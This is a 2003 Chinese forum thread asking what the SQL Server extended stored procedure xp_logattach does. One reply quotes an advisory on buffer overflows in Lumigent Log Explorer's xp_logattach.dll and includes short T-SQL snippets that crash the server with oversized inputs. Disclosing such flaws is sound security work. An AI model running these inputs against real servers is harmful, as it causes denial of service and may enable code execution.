极度深奥的问题!!有没有谁知道“xp_logattach ”这个存储过程的实际作用与用法。

lly7761 2003-09-13 11:06:35
如题!!
...全文
61 11 打赏 收藏 转发到动态 举报
写回复
用AI写文章
11 条回复
切换为时间正序
请发表友善的回复…
发表回复
awjx 2003-09-19
  • 打赏
  • 举报
回复
帮你顶!
realgz 2003-09-17
  • 打赏
  • 举报
回复
我也在等。
atlasGS 2003-09-17
  • 打赏
  • 举报
回复
研究
litf 2003-09-17
  • 打赏
  • 举报
回复
学习
宸瑜 2003-09-16
  • 打赏
  • 举报
回复
关注
lly7761 2003-09-16
  • 打赏
  • 举报
回复
希望大家帮帮
benxie 2003-09-14
  • 打赏
  • 举报
回复
学习学习
leimin 2003-09-14
  • 打赏
  • 举报
回复
xp_logattach 是Lumigent公司带的一个扩展的存储过程:

Lumigent Log Explorer is a transaction log explorer for Microsoft SQL
Server 7/2000. It ships with extended stored procedures implemented in
xp_logattach.dll. Some of them suffer from buffer overflows that lead to
SQL Server service crash and potentially to arbitrary code execution.
Below is sample code that crashes SQL Server:

declare @bo varchar(8000)
set @bo = replicate('A', 800)
exec xp_logattach_StartProf @bo

declare @bo varchar(8000)
set @bo = replicate('A',800)
exec xp_logattach_setport @bo

declare @bo varchar(8000)
set @bo = replicate('A',800)
exec xp_logattach @bo

Procedures can be run only by dbo (master) by default. Vendor was informed
but I got no response confirming this problem and no fixes.
lfengxu 2003-09-13
  • 打赏
  • 举报
回复
没有玩过呀!!!
跟着大家学习学习
eastpond 2003-09-13
  • 打赏
  • 举报
回复
搞了半天,也不搞不懂。
ft 2003-09-13
  • 打赏
  • 举报
回复
这是一个查看MSSQL SERVER日志的公司的一个扩展存储过程,
我也在研究这个, 不过没有什么结果, 看了看他的另一个引用的DLL,
几十个函数, 只有自己明白原理再开发, 研究他没什么价值了,

希望能够联系一下:
mail: hbezwwl@163.com
qq: 53320295
msn: hbezwwl@163.com

22,209

社区成员

发帖
与我相关
我的任务
社区描述
MS-SQL Server 疑难问题
社区管理员
  • 疑难问题社区
  • 尘觉
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧